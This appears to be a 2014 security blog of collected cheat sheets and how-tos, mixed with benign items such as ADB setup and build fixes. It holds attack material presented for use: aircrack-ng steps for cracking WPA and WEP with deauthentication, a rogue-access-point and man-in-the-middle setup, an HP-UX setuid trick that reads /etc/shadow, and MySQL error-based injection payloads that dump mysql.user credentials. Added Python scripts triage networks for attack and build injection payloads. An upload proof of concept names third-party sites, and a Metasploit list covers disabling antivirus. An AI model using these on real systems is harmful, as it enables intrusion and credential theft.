Jun 28, 2014

CheatSheet: Nikto Cheat Sheet







Source: http://needsec.com/wp-content/uploads/2013/11/CheatSheetNikto.pdf

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

All of the wireless hacking command steps

Cracking WPA
airmon-ng start wlan0
airodump-ng -c (channel) --bssid (AP MAC) -w (filename) mon0
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {deauthentication attack, forces the client to reconnect so the 4-way handshake is captured}
aircrack-ng -0 -w (wordlist path) (capture filename)

Cracking WEP with Connected Clients
airmon-ng start wlan0 (channel)
airodump-ng -c (channel) --bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {deauthentication attack}
aireplay-ng -3 -b (AP MAC) -h (OUR MAC) mon0 {ARP replay attack}

Cracking WEP via a Client
airmon-ng start wlan0 (channel)
airodump-ng -c (channel) --bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
aireplay-ng -2 -b (AP MAC) -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 {interactive packet replay, selecting broadcast packets of 68-86 bytes (ARP)}
aireplay-ng -2 -r (replay cap file) mon0 {inject using cap file}
aircrack-ng -0 -z -n 64 filename.cap {PTW attack, 64-bit key}

ARP amplification
airmon-ng start wlan0 (channel)
airodump-ng -c (channel) --bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 500 -q 8 -a (AP MAC) mon0 {fake authentication, re-associate every 500 s, keepalive every 8 s}
aireplay-ng -5 -b (AP MAC) -h (OUR MAC) mon0 {fragmentation attack, recovers a PRGA xor file}
packetforge-ng -0 -a (AP MAC) -h (OUR MAC) -k 255.255.255.255 -l 255.255.255.255 -y (FRAGMENT.xor) -w (filename.cap)
tcpdump -n -vvv -e -s0 -r (replay_dec.#####.cap)
packetforge-ng -0 -a (AP MAC) -h (OUR MAC) -k (destination IP) -l (source IP) -y (FRAGMENT.xor) -w (filename.cap)
aireplay-ng -2 -r (filename.cap) mon0

Cracking WEP w/ shared key AUTH
airmon-ng start wlan0 (channel)
airodump-ng -c (channel) --bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication; this will error out against shared key auth}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {deauthentication attack, so airodump-ng captures the shared key exchange and writes the PRGA xor file}
aireplay-ng -1 60 -e (ESSID) -y (sharedkeyfile) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication w/ PRGA xor file}
aireplay-ng -3 -b (AP MAC) -h (OUR MAC) mon0 {ARP replay attack}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {deauthentication attack}
aircrack-ng -0 -z -n 64 filename.cap {PTW attack, 64-bit key}

ENVIRONMENT VARIABLE SETUP
cat filename
while read -r var; do echo "export $var" >> ~/.bashrc; done < filename
tail ~/.bashrc

Cracking a Clientless WEP (FRAG AND KOREK)
{FRAG}
airmon-ng start wlan0 (channel)
airodump-ng -c (channel) --bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 60 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
aireplay-ng -5 -b (AP MAC) -h (OUR MAC) mon0 {fragmentation attack}
packetforge-ng -0 -a (AP MAC) -h (OUR MAC) -l 255.255.255.255 -k 255.255.255.255 -y (fragment filename) -w filename.cap
tcpdump -n -vvv -e -s0 -r filename.cap {TEST}
aireplay-ng -2 -r filename.cap mon0

{KOREK}
aireplay-ng -4 -b (AP MAC) -h (OUR MAC) mon0 {KoreK chopchop attack}
tcpdump -n -vvv -e -s0 -r replayfilename.cap
packetforge-ng -0 -a (AP MAC) -h (OUR MAC) -l 255.255.255.255 -k 255.255.255.255 -y (fragment filename xor) -w filename.cap {-l source IP, -k destination IP}
aireplay-ng -2 -r filename.cap mon0
aircrack-ng -0 filename.cap

Karmetasploit
airbase-ng -c (channel) -P -C 60 -e "FREE WiFi" -v mon0
ifconfig at0 up 10.0.0.1/24
mkdir -p /var/run/dhcpd
chown -R dhcpd:dhcpd /var/run/dhcpd
touch /var/lib/dhcp3/dhcpd.leases
cat /tmp/dhcpd.conf
touch /tmp/dhcp.log
chown dhcpd:dhcpd /tmp/dhcp.log
dhcpd3 -f -cf /tmp/dhcpd.conf -pf /var/run/dhcpd/pid -lf /tmp/dhcp.log at0
msfconsole -r /root/karma.rc

Bridge CTRL man in the middle SETUP
airbase-ng -c 3 -e "FREE WiFi" mon0
brctl addbr hacker {bridge interface name}
brctl addif hacker eth0
brctl addif hacker at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig hacker 192.168.1.8 up
ifconfig hacker
echo 1 > /proc/sys/net/ipv4/ip_forward

pyrit DB attacks
pyrit eval
pyrit -i (wordlist) import_passwords
pyrit -e (essid) create_essid
pyrit batch
pyrit -r (capturefile) -b (AP MAC) attack_db

pyrit strip command
pyrit -r (capturefile) -o (capturefile output) strip

pyrit dictionary attack
pyrit -r (capturefile) -i (/pathtowordlist) -b (AP MAC) attack_passthrough

airgraph-ng
airgraph-ng -i filename.csv -g CAPR -o outputfilename.png
eog outputfilename.png
airgraph-ng -i filename.csv -g CPG -o outputfilename.png
eog outputfilename.png

airdecap-ng
airdecap-ng -b (VIC AP MAC) capturefile.cap {open network: only strips the 802.11 headers}
wireshark capturefile-dec.cap
airdecap-ng -w (WEP KEY) capturefile.cap
wireshark capturefile-dec.cap
airdecap-ng -e (VIC ESSID) -p (WPA PASSWORD) capturefile.cap
wireshark capturefile-dec.cap
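As an added example (not part of the cheat sheet above or of the aircrack-ng project), the Python script below parses the airodump-ng CSV export that airgraph-ng reads and sorts each network into the cheat-sheet section that applies: WPA with a client to deauthenticate, WEP with connected clients (ARP replay), WEP with shared-key auth (PRGA xor file needed), clientless WEP (fragmentation/chopchop), and unassociated clients probing for networks, which is what airbase-ng -P in the Karmetasploit section answers. The column layout is airodump-ng's CSV format (AP table, blank line, station table, with probed ESSIDs spilling over extra columns); the SAMPLE_CSV rows are constructed, not a real capture, and the function names are mine.

```python
"""Parse airodump-ng's CSV export (the file airgraph-ng reads) and map each
network to the attack path from the cheat sheet above.

Added example, not part of the original cheat sheet or of aircrack-ng.
The column layout is airodump-ng's CSV export (AP table, blank line, station
table); the sample rows below are constructed, not a real capture.
"""
import csv
import io
from dataclasses import dataclass, field

NOT_ASSOCIATED = "(not associated)"   # BSSID airodump-ng prints for roaming clients


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str                      # OPN, WEP, WPA, WPA2, "WPA2 WPA" ...
    auth: str                         # OPN, SKA (shared key), PSK, MGT
    essid: str
    clients: list = field(default_factory=list)


@dataclass
class Station:
    mac: str
    bssid: str                        # NOT_ASSOCIATED if not connected
    probes: list                      # ESSIDs the client is probing for


def parse_airodump_csv(text):
    """Return ({bssid: AccessPoint}, [Station]) from airodump-ng CSV text."""
    aps, stations, section = {}, [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        row = [c.strip() for c in row]
        if not any(row):
            continue                  # blank line between the two tables
        if row[0] == "BSSID":
            section = "ap"
            continue
        if row[0] == "Station MAC":
            section = "station"
            continue
        if section == "ap" and len(row) >= 14:
            aps[row[0]] = AccessPoint(bssid=row[0], channel=int(row[3]),
                                      privacy=row[5], auth=row[7], essid=row[13])
        elif section == "station" and len(row) >= 6:
            # probed ESSIDs are comma separated, so they spill into extra columns
            stations.append(Station(mac=row[0], bssid=row[5],
                                    probes=[p for p in row[6:] if p]))
    for st in stations:               # the client->AP edges airgraph-ng's CAPR graph draws
        if st.bssid in aps:
            aps[st.bssid].clients.append(st.mac)
    return aps, stations


def triage(aps, stations):
    """Bucket networks by the cheat-sheet section that applies to them."""
    plan = {"wpa_with_clients": [], "wpa_clientless": [], "wep_with_clients": [],
            "wep_shared_key": [], "wep_clientless": [], "probing_clients": {}}
    for bssid, ap in sorted(aps.items()):
        if ap.privacy.startswith("WPA"):
            # handshake capture needs a client to deauth (aireplay-ng -0)
            plan["wpa_with_clients" if ap.clients else "wpa_clientless"].append(bssid)
        elif ap.privacy == "WEP":
            if ap.auth == "SKA":
                plan["wep_shared_key"].append(bssid)    # fake auth needs the PRGA xor file
            elif ap.clients:
                plan["wep_with_clients"].append(bssid)  # ARP replay (aireplay-ng -3)
            else:
                plan["wep_clientless"].append(bssid)    # fragmentation (-5) / chopchop (-4)
        # OPN: nothing to crack, just sniff (airdecap-ng -b)
    for st in stations:
        if st.bssid == NOT_ASSOCIATED and st.probes:
            plan["probing_clients"][st.mac] = st.probes  # airbase-ng -P answers these probes
    return plan


# Constructed sample in airodump-ng's CSV layout (not a real capture).
SAMPLE_CSV = """\

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2014-06-28 10:00:00, 2014-06-28 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,   8, HomeWiFi, 
66:77:88:99:AA:BB, 2014-06-28 10:00:00, 2014-06-28 10:05:00, 11,  54, WEP , WEP , OPN, -65,       80,      340,   0.  0.  0.  0,   6, OldNet, 
CC:DD:EE:FF:00:11, 2014-06-28 10:00:00, 2014-06-28 10:05:00,  1,  54, WEP , WEP , SKA, -55,       60,       12,   0.  0.  0.  0,   5, Store, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2014-06-28 10:00:10, 2014-06-28 10:04:50, -50,       35, 00:11:22:33:44:55, HomeWiFi
AA:BB:CC:DD:EE:02, 2014-06-28 10:01:00, 2014-06-28 10:02:00, -70,        3, (not associated), FREE WiFi,CoffeeShop
AA:BB:CC:DD:EE:03, 2014-06-28 10:01:30, 2014-06-28 10:03:00, -60,       10, CC:DD:EE:FF:00:11, 
"""

if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for bucket, members in triage(aps, stations).items():
        print(bucket, members)
```

Run it against a real `airodump-ng -w filename` CSV by reading `filename-01.csv` instead of SAMPLE_CSV; the station table is what tells you whether a deauth has anything to hit before you start replaying.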


Source: https://evilzone.org/security-tools/aircrack-ng-suite-cheatsheet/ 



CheatSheet: Detecting Intrusion




Download Link: https://8ack.de/dontpanic/linsacheatsheet.pdf


Jun 27, 2014

Howto: Mac OS X ADB Configuration

1. Plug the device into the Mac.

2. On your device, change the USB mode to "Send images (PTP)". It will prompt you about USB debugging.

3. Get your vendor ID: "Apple logo" (top left) -> "About This Mac" -> "More Info..." -> "System Report" -> "USB" -> "USB Hi-Speed Bus" -> "Hub" -> <Your device> -> Vendor ID (in this case, my ID is "0x1004").



4. Add into your android configure profile.
echo "0x1004" >> ~/.android/adb_usb.ini

5. In Mac OSX, Update device list
/adt-bundle-mac-x86_64-20140321/sdk/tools/android update adb 

6. In Mac OSX, restart the adb server
/adt-bundle-mac-x86_64-20140321/sdk/platform-tools/adb kill-server
/adt-bundle-mac-x86_64-20140321/sdk/platform-tools/adb start-server

7. Try to get the list of devices
/adt-bundle-mac-x86_64-20140321/sdk/platform-tools/adb devices

Done.



Jun 26, 2014

Tools: Malcom - Malware Communication Analyzer

Malcom is a tool designed to analyze a system's network communication using graphical representations of network traffic. This comes in handy when analyzing how certain malware species try to communicate with the outside world.
Malcom can help you:
  • detect central command and control (C&C) servers
  • understand peer-to-peer networks
  • observe DNS fast-flux infrastructures
  • quickly determine if a network artifact is 'known-bad'
The aim of Malcom is to make malware analysis and intel gathering faster by providing a human-readable version of network traffic originating from a given host or network. Convert network traffic information to actionable intelligence faster.

Source: https://github.com/tomchop/malcom



Tools: phpMyAdmin Honeypot - A simple and effective phpmyadmin honeypot

[Requirements]
      You will need...

      1. A web server (preferably running the current version of Apache)

      2. The ability to change file permissions on the web server

      3. To know at least a little HTML and PHP

      4. About 30 minutes of free time

      5. For automated alert generation, access to a Log Manager / SIEM is recommended

[Installation]

Medium-Interaction Version:
      1. Upload the /phpmyadmin-interactive/ folder to the root of your web directory and change the folder name to /phpmyadmin/

      2. Change the permissions on /phpmyadmin/log.txt to 700 so that the file can be written to by the web user:
           $ chmod 700 log.txt

      3. Assure that all contents of the directory are owned by the 'web user' (www-data / apache / etc.)
           $ chown -R www-data:www-data /var/www/phpmyadmin/

      4. Add the following lines to your robots.txt file (or create one in the root of your web server) so that web crawlers won't index the /phpmyadmin/ directory but attackers reading robots.txt will find it:
           # Directories
           Disallow: /phpmyadmin/
           # Files
           Disallow: /phpmyadmin/index.php

      5. Change the name of the default log file (log.txt) and move it to a separate directory.
           Update the file location within the index.php, login.php, phpinfo.php, and master-config/index.php files.

      6. Modify the credentials permitted to 'access' the phpmyadmin landing page within login.php on the following line:
           if (preg_match("[USERNAME, PASSWORD]", $comma_delimited_list)) {

      7. Test to assure that access to each page is being logged to the 'log.txt' file.

      8. Parse the logs using the included Regular Expression (below) if you would like to integrate with your SIEM / Log Management solution.

      9. That's it, now just sit back and see how many flies you can catch!


Source: https://github.com/gfoss/phpmyadmin_honeypot


Howto: HP-UX 0day local privilege escalation

Suddenly I realized there are some "old" binaries (related to the functionality) present on the system:
-r-sr-xr-x   1 root       bin         920588 Feb 15  2007 /usr/bin/pppd
-r-sr-xr-x   1 root       bin          87136 Feb 15  2007 /usr/bin/pppoec
The pppd can't be executed by unprivileged users. The pppoec has the following command line arguments:
pppoec -i interface-name [ -c config-file ][ -d debug-level ][ -l log-file ]
Both binaries are setuid root (the s in -r-sr-xr-x), so the config file named with -c is opened with root privileges and the log file named with -l is written wherever the caller chooses. Interesting! Let's think like a hacker! ;)
/usr/bin/pppoec -i xx1 -r 1 -c /etc/shadow -d 1 -l /tmp/loggg.txt


Source: http://blog.silentsignal.eu/2014/06/25/hp-ux-0day-local-privilege-escalation/


Howto: A new error-based SQL injection vector (from the Rdot forum)

This vector does not work on older versions. The maximum length of an error message is defined in mysys/my_error.c:
/* Max length of a error message. Should be kept in sync with MYSQL_ERRMSG_SIZE. */
#define ERRMSGSIZE (512)

 

Today's topic is alternative error-based vectors. It is an important and pressing subject, and I would like to discuss one of them in more detail. Briefly: the vector is based on a data type overflow error (not necessarily an integer one):

mysql> SELECT 2 * 18446744073709551610;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'

mysql> SELECT -1 * 9223372036854775808;
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(-(1) * 9223372036854775808)'

Part of the query is printed in the error text, but unlike a syntax error this one is raised during execution rather than before it, as in:

mysql> SELECT 123 abc d;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd' at line 1

Because the error is raised at execution time, a constant subquery in the printed expression has already been evaluated and is printed as its value. By manipulating the input data we can therefore display whatever we want:
Code:

mysql> SELECT 2 * (if ((SELECT * from (SELECT (version())) s), 18446744073709551610, 18446744073709551610));
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select '5.5' from dual), 18446744073709551610,18446744073709551610))'
// Output: 452 characters

And even more:
mysql> SELECT 2 * if ((SELECT * from (select * from test.shop) as `` limit 1) > (SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select `article`,`dealer`,`price` from (select `test`.`shop`.`article` AS `article`,`test`.`shop`.`dealer` AS `dealer`,`test`.`shop`.`price` AS `price` from `test`.`shop`) limit 1) > (select `test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from `test`.`shop` limit 1)),18446744073709551610,18446744073709551610))'
// Leaks the names of the columns in the table

And even more:

mysql> SELECT 2 * if ((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610);
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select 'localhost','root','*','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','','0','0','0','0','','' from dual limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2)),18446744073709551610,18446744073709551610))'
// Outputs the data from all the columns at once


In the MariaDB fork, subqueries are not printed in the error:
Code:

mysql> SELECT 2 * (if ((SELECT * FROM (SELECT (version())) s), 18446744073709551610, 18446744073709551610));
ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select #), 18446744073709551610,18446744073709551610))'

Solution (simplified, with a small modification):

mysql> SELECT (i IS NOT NULL) - 9223372036854775808 FROM (SELECT (version()) i) a;
ERROR 1690 (22003): BIGINT value is out of range in '(('5.5-MariaDB' is not null) - (9223372036854775808))'
// Output: 475 characters
 


Slightly shortened queries (extra brackets removed, the number written differently) with a useful character added to the output:

Display information
SELECT 2 * (if ((SELECT * from (SELECT (version())) s), 18446744073709551610, 18446744073709551610))
=
select 1E308 * if ((select * from (select version()) x), 2,2)

SELECT (i IS NOT NULL) - 9223372036854775808 FROM (SELECT (version()) i) a
=
select if (x, 2,2) * 1E308 from (select version() x) y
(needs checking on MariaDB!)

Learn the names of the columns in a table
SELECT 2 * if ((SELECT * from (select * from test.shop) as `` limit 1) > (SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610)
=
select 1E308 * if ((select * from (select * from mysql.user) `` limit 1) > (select * from mysql.user limit 1), 2,2)

Output from all columns:
SELECT 2 * if ((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610)
=
select 1E308 * if ((select * from (select * from mysql.user LIMIT 1) `` limit 1) < (select * from mysql.user limit 0), 2,2)

And if only certain columns are wanted, the output can be made clean:

select 1E308 * if ((select user||host||password||file_priv from (select * from mysql.user LIMIT 1) a limit 1), 2,2)
+ Bonus: learn the number of columns in the table
select 1E308 * if ((select * from mysql.user limit 1) > (select 1), 2,2)

SELECT (i IS NOT NULL) - 9223372036854775808 FROM (SELECT (version()) i) a
gives the maximum number of characters (475). It probably cannot be improved.
The fewer characters at the beginning and at the end of the expression, the more of the 512-byte error message is left for the data, so:
select 1E308 * if ((select user||host||password||file_priv from (select * from mysql.user LIMIT 1) a limit 1), 2,2);
=>
select 2 * if ((select user||host||password||file_priv from (select * from mysql.user LIMIT 1) a limit 1), 1e308, 0);
A small bonus from this step:

mysql> select (select * from mysql.user) = 1;
mysql> select (select * from mysql.user) in (1);
ERROR 1241 (21000): Operand should contain 42 column(s)

1E308 is not hex; it is simply a number that, once certain operations are applied to it, goes out of the range of its type (DOUBLE, BIGINT, BIGINT UNSIGNED, DECIMAL).

Source: https://rdot.org/forum/showthread.php?t=3167 



Jun 25, 2014

Howto: FIX "libtool: Version mismatch error."

1.  make maintainer-clean
2. autoreconf --force --install 
3. ./configure
4. make
5. make install
 


Howto: Fix Glib Compile Error in CentOS

If you got 
"*** You must have either have gettext support in your C library, or use the
*** GNU gettext library. (http://www.gnu.org/software/gettext/gettext.html"

fix with 
export PATH=$PATH:/usr/local/bin

and try to use your autogen.sh again
 


Jun 24, 2014

Error-based SQL injection to get the database user

sql > select!x-~0.FROM(select+user()x)f;
BIGINT UNSIGNED value is out of range in '((not('root@localhost')) - ~(0))'

The + is a URL-encoded space. !x evaluates to 0 or 1 and ~0 to 18446744073709551615, so the subtraction goes out of the BIGINT UNSIGNED range and the error text prints the evaluated derived column x, i.e. the result of user().


From Nic & Phitchayapong
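As an added example covering both the Rdot vector above and this one-liner (not code from either post), the Python helpers below build the two payload shapes shown on the page (`2*if((...),1e308,0)` and `!x-~0`) and parse the leaked string literals back out of the MySQL error text, flagging messages that were cut off by ERRMSGSIZE (512), which is the reason the post cares about how many characters the wrapper itself consumes. The SAMPLE_ERRORS strings are constructed in the shape the posts show, not captured from a server; the function and constant names are mine.

```python
"""Helpers for the BIGINT/DOUBLE overflow error-based vector discussed above.

Added example, not from the Rdot post: builds the two payload shapes shown on
the page and parses leaked data back out of the MySQL error text, including the
ERRMSGSIZE truncation the post warns about.
"""
import re

# mysys/my_error.c: #define ERRMSGSIZE (512), kept in sync with MYSQL_ERRMSG_SIZE
ERRMSGSIZE = 512

# "<TYPE> value is out of range in '<expr>'": <expr> is the optimizer's view of
# the query, with constant subqueries already replaced by their values.
_OUT_OF_RANGE = re.compile(
    r"(?P<type>BIGINT UNSIGNED|BIGINT|DOUBLE|DECIMAL) value is out of range in '(?P<rest>.*)$",
    re.S,
)
# string literals inside the printed expression (backslash escapes allowed)
_STRING = re.compile(r"'((?:[^'\\]|\\.)*)'")


def overflow_payload(subquery):
    """select 2*if((<subquery>),1e308,0): 2 * 1e308 exceeds DOUBLE's range, and the
    evaluated subquery is printed in the error. Shortest prefix/suffix, as the post notes."""
    return "select 2*if((%s),1e308,0)" % subquery


def compact_payload(scalar_select):
    """select!x-~0.from(<scalar_select> x)f: !x is 0 or 1 and ~0 is 2**64-1, so the
    subtraction underflows BIGINT UNSIGNED and the derived column x is printed.
    Spaces can be sent as '+' in a URL, as in the one-liner on the page."""
    return "select!x-~0.from(%s x)f" % scalar_select


def extract_leak(error_text):
    """Pull leaked string literals out of an out-of-range error message.

    Returns None if the text is not an out-of-range error, otherwise a dict with
    the numeric type that overflowed, the printed expression, the string literals
    found in it (in order) and whether the message looks truncated by ERRMSGSIZE
    (no closing quote, or unbalanced parentheses)."""
    m = _OUT_OF_RANGE.search(error_text)
    if not m:
        return None
    rest = m.group("rest").rstrip()
    closed = rest.endswith("'")
    expr = rest[:-1] if closed else rest
    truncated = (not closed) or expr.count("(") != expr.count(")")
    return {
        "type": m.group("type"),
        "expr": expr,
        "values": _STRING.findall(expr),
        "truncated": truncated,
    }


# Constructed error texts in the shape the posts show (not captured from a real server).
SAMPLE_ERRORS = [
    "ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in "
    "'((not('root@localhost')) - ~(0))'",
    "ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in "
    "'(2 * if(((select 'localhost','root','*','Y','Y','','0' from dual limit 1) < (1,2,3,4,5,6,7)),"
    "18446744073709551610,18446744073709551610))'",
    # cut off mid-expression, as a message longer than ERRMSGSIZE would be
    "ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in "
    "'(2 * if(((select 'localhost','root','*','Y','Y','Y','Y','Y','Y','Y' from dual",
]

if __name__ == "__main__":
    print(overflow_payload("select user()"))
    print(compact_payload("select user()"))
    for err in SAMPLE_ERRORS:
        print(extract_leak(err))
```

When `truncated` comes back True, shorten the wrapper (the post's `2*if(...,1e308,0)` form) or select fewer columns, exactly the trade-off the post describes for the 475-character ceiling.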



Howto: Remove PPSync(Application that you got from Jailbreak iOS 7.1)

1. Go to Cydia
2. Go to Manage > Sources > Edit > Add.
3. Add Repository http://cydia.angelxwind.net/
4. Search and install PPSync Remover
5. Remove PPStore from Cydia
6. After that reboot
7. Go to Settings > General > Profiles and delete the 25pp certificate. Done.



jQuery PHP Arbitrary Upload

[+] Arbitrary Upload on jQuery/PHP
[+] Date: 23/06/2014

[+] Risk: High

[+] CWE Number : CWE-264

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: http://rafaelcouto.com.br/upload-dinamico-com-php-jquery/#sthash.uVv21WU9.dpuf

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Linux

[+] Dork: "Upload dinâmico com jQuery/PHP"

[+] Exploit : http://host/patch/upload.php

[+] PoC:

http://www.agendXavisual.com/php/uploads_multiplos_1_modific/upload.php
http://www.agenXdavisual.com/php/uploads_multiplos_1_modific/uploads/e3b334538b7fc18a74286412bc388010.txt

http://lagodoy.nXo-ip.biz/projetos/lagodoy/upload_dinamico/upload.php
http://lagodoyX.no-ip.biz/projetos/lagodoy/upload_dinamico/uploads/03cd4c9a05c8b2a4b2ede68a7b4a5fdb.txt

http://estatisXtica.br/caem/mostra2013/formularios/upload_comprovante.php
http://estatiXstica.br/caem/mostra2013/formularios/uploads/573437f23846bacf89c7e37193cfd224.txt


Source: http://cxsecurity.com/issue/WLB-2014060131



Tools: Infrastructure with Python

awscli

THE command line interface if you're using AWS. Really nice documentation on how to talk to the different AWS services. I use this a lot as a glue library. For example, once Jenkins runs tests on a project, we tar.gz an artifact and use awscli to upload it to S3.

boto

If you’re using AWS and need to get state or resources at runtime boto is what you want. The API is large, but well documented and composed.
botocore is a smaller low-level alternative, but I don’t care much about size when boto’s docs are good. botocore is the foundation for awscli.

Fabric

Fabric is my go-to tool for remote execution. PyChef fetches the hosts I need and passes them to Fabric, which takes care of running any commands. This is a popular lib that has been around for a while; a lot of well-tested features.

Flask

A web framework? Yes. A lot of the headache of managing infrastructure can be alleviated by having good visibility on what your system is doing. Flask is great for building small simple dashboards to present information on various subsystems.

PyChef

A Python API for interacting with your Chef server. I use this in our deployment and monitoring tooling. When I want to deploy an app, I use PyChef to search for the nodes that the app is currently on and use Fabric to deploy to those hosts.

python-simple-hipchat

My team uses Hipchat. We have rooms set up that alert us to problems across our infrastructure. This library is simple and just works.

requests

Lots of my infrastructure work is tying different services together. If the data I need is behind an HTTP API, requests is usually the easiest way to get it. The context here is important.
If there is an API wrapper library already written, I’ll use it if I’ll be using several different endpoints. If I’m only hitting a few endpoints or they are simple, I find it’s usually easier to just use requests instead.

supervisor

I’m not a fan of writing init scripts in the archaic init.d syntax, and Upstart limits you to Ubuntu. supervisor makes it easy to run Python code inside virtual environments. Sold.

troposphere

troposphere allows you to describe AWS CloudFormation stacks in Python. You can then generate your JSON. The main advantage here for me was keeping my stack definitions DRY. Instead of doing the same thing over and over again in JSON, I just define it once in Python and import it when I need it.

uwsgi

When I need an application server, I reach for uwsgi. It's simple, highly configurable and has built-in support for virtualenvs. It also works well with supervisor and nginx (my proxy of choice). There are a lot of alternatives to uwsgi, but I don't need async so they aren't very compelling.

Source: http://dustinrcollins.com/infrastructure-with-python



Linux I/O




Howto: iOS Jailbreak 7.1.x

  1. Make sure you have iTunes installed.
  2. Edit your iPhone's date to June 2, 2014
  3. Open the PanGu.exe file(Download From http://dl.pangu.25pp.com/jb/Pangu_v1.0.exe)
  4. Click the black button to the right (also UNCHECK THE CHECKMARK where you see random characters and the "PP")
  5. As soon as the "brush stroke" loading bar fills to 20%, the PanGu app will appear on your phone
  6. Tap it
  7. Select Continue
  8. It will fill the loading brush stroke until 80% and your iTunes will open (it will only open IF you have iTunesHelper.exe on your Windows Taskbar)
  9. Close iTunes
  10. Your device will reboot
  11. When it opens again, wait for the brush stroke to complete to 100%
  12. Your device will reboot once more
  13. The process will be finished 100%
  14. The PanGu app will be replaced with Cydia
  15. Do your usual stuff by opening Cydia and continue with what you want to install by then.
  16. For precautionary measures, install Complete PPSync Remover (on http://cydia.angelxwind.net repo) because even though you uncheck the "PP" on step 4, it installs it anyway (internally without the app showing)

Source: http://lifehacker.com/ios-7-1-1-untethered-jailbreak-released-1594866825




IRMA - Incident Response Malware Analysis

IRMA intends to be an open-source platform designed to help identify and analyze malicious files.
However, today's defense is not only about learning about a file, but also about getting a fine overview of the incident you dealt with: where / when a malicious file has been seen, who submitted a hash, where a hash has been noticed, which anti-virus detects it, ...
An important value of IRMA is that you keep control over where your data goes and who gets it. Once you install IRMA on your network, your data stays on your network.
Each submitted file is analyzed in various ways. For now, we focus our efforts on multiple anti-virus engines, but we are working on other "probes" (feel free to submit your own).



Source: http://irma.quarkslab.com/




Jun 23, 2014

Howto: Blocking Installation of Baidu Application

1. Create block.bat

2. Edit block.bat with the following (each line creates a plain file with the name of a directory the installer expects to create, so the installer cannot create that directory and fails):
echo  NoBaidu  >  "%ProgramFiles%\Baidu"
echo  NoBaidu  >  "%ProgramFiles%\Baidu Security"
echo  NoBaidu  >  "%ProgramFiles%\Hao123"

echo  NoBaidu  >  "%ProgramFiles(x86)%\Baidu"
echo  NoBaidu  >  "%ProgramFiles(x86)%\Baidu Security"
echo  NoBaidu  >  "%ProgramFiles(x86)%\Hao123"

echo  NoBaidu  >  "%AppData%\Baidu"
echo  NoBaidu  >  "%AppData%\Baidu Security"
echo  NoBaidu  >  "%AppData%\Hao123"

echo  NoBaidu  >  "%LocalAppData%\Baidu"
echo  NoBaidu  >  "%LocalAppData%\Baidu Security"
echo  NoBaidu  >  "%LocalAppData%\Hao123"

echo  NoBaidu  >  "%ProgramData%\Baidu"
echo  NoBaidu  >  "%ProgramData%\Baidu Security"
echo  NoBaidu  >  "%ProgramData%\Hao123" 


3. Save

4. Run block.bat

Source:: http://pantip.com/topic/32022860


Howto: Best Post Exploitation In Metasploit

getgui

The 'getgui' script is used to enable RDP on a target system if it is disabled.

getcountermeasure

The 'getcountermeasure' script checks the security configuration on the victim's system and can disable other security measures such as A/V, firewall, and much more.

checkvm

The 'checkvm' script, as its name suggests, checks to see if you exploited a virtual machine. This information can be very useful.

get_local_subnets

The 'get_local_subnets' script is used to get the local subnet mask of a victim. This can be very useful information to have for pivoting.

gettelnet

The 'gettelnet' script is used to enable telnet on the victim if it is disabled.

hostsedit

